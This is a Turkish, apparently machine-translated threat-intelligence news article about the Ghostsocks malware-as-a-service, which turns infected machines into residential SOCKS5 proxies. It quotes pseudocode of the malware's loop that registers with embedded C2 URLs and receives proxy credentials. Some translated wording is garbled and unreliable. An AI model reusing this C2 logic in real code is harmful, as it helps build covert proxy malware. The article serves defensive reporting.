Ghostsocks olarak bilinen bir operatör, 15 Ekim 2023’te Rus siber suç forumu XSS.S’de hizmet olarak yeni bir kötü amaçlı yazılım (MAAS) reklamını yaptı ve uzlaştırılmış cihazları konut çoraplarına dönüştürmeyi vaat etti5 proxy’leri.
Hizmet, kavrama karşıtı sistemleri atlamak ve ağ savunucuları tarafından algılanmaktan kaçınmak için konut IP adreslerine yerleştirilen doğal güvenden yararlandı.
Erken tanıtım yayınları, hem Windows hem de UNIX hedefleri için cihazların, alt hesapların ve otomatik yapı üretiminin merkezi yönetimini sunan Web tabanlı bir kontrol panelini sergiledi.
.webp)
Ghostsocks Maas modeli, dış proxy sunucularını korumak için tehdit aktörlerinin ihtiyacını ortadan kaldırarak operasyonel maliyetleri ve altyapı karmaşıklığını azaltır.
Yapılar doğal Go’da derlenir ve gizlemeden önce 3 MB’den 8 MB’a kadar uzanır ve dize ve sembol gizleme için açık kaynaklı garble projesini kullanır.
Bir kez konuşlandırıldıktan sonra, Ghostsocks tamamen bellekte çalışır ve SOCKS5 işlevselliği kendi kalıcılık mekanizmasını uygulamadan sağlar.
Sentif analistler, kötü amaçlı yazılımların Lummastealer gibi diğer başlangıç-erişim araçlarına olan güvenini, kurban sistemleri üzerinde dayanak kazanmak ve modern tehdit aktör ekosistemlerinin birbirine bağlı doğasını vurgulayarak kaydetti.
Hizmet hızla düşük seviyeli siber suçluların ötesinde çekiş kazandı; Şubat 2025’ten itibaren sızdırılmış Blackbasta Fidye yazılımı sohbet günlükleri, şüphe yaratmadan uzun vadeli ağ erişimini sürdürmek için Lummastealer ile birlikte hayaletlerin entegre edilmesiyle ilgili tartışmaları ortaya koyuyor.
.webp)
Lummastealer altyapısının kolluk kuvvetlerinin yayılmasının ardından, hayaletler yeraltı forumlarında daha az görünürlükle de olsa, çalışmaya devam etti.
Esnekliği, sürekli gelişen siber suç manzarasında Maas tekliflerinin uyarlanabilirliğini vurgular.
Enfeksiyon mekanizması
Ghostsocks dağıtımları genellikle ayrı bir kötü amaçlı yazılım ailesi tarafından teslim edilen bir damlalıkla başlar. Yürütme üzerine, Ghostsocks Binary ilk olarak küresel bir muteks kazanır "start_to_run" Birden fazla örneği önlemek için.
Sonra arar %TEMP% bir yapılandırma dosyası için dizin; Kullanılamazsa, sert kodlanmış şifreli bir bloba geri döner.
Bu lekeyi çözdükten sonra Ghostsocks, başarılı bir HTTP 200 yanıtı döndürülene kadar gömülü C2 URL’leri listesi üzerinde yinelenir, bu noktada SOCKS5 kimlik bilgilerini hükümler verir.
Aşağıdaki sahte kod, röle çözünürlük döngüsünü göstermektedir:-
for _, url := range c2List {
resp, err := http.Get(url + "/apihelper-first-register?buildVersion=" + version +
"&proxyPassword=" + pwd + "&proxyUsername=" + user)
if err != nil || resp.StatusCode != http.StatusOK {
continue
}
creds := extractCredentials(resp.Body)
setupSocks5(creds)
break
}Kayıttan sonra, Ghostsocks açık kaynaklı Go-Socks5 ve Yamux kütüphanelerini kullanarak geri bağlantılı bir SOCKS5 oturumu ortaya çıkarır ve kurban sunucusunu aşağı akış müşterileri için şeffaf bir röleye etkili bir şekilde dönüştürür.
.webp)
Bu enfeksiyon mekanizması, tehdit aktörlerinin, tespit edilebilir ağ altyapısını en aza indirirken, tehlikeye atılan ana bilgisayarlardan ölçeklendirmelerini sağlar.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
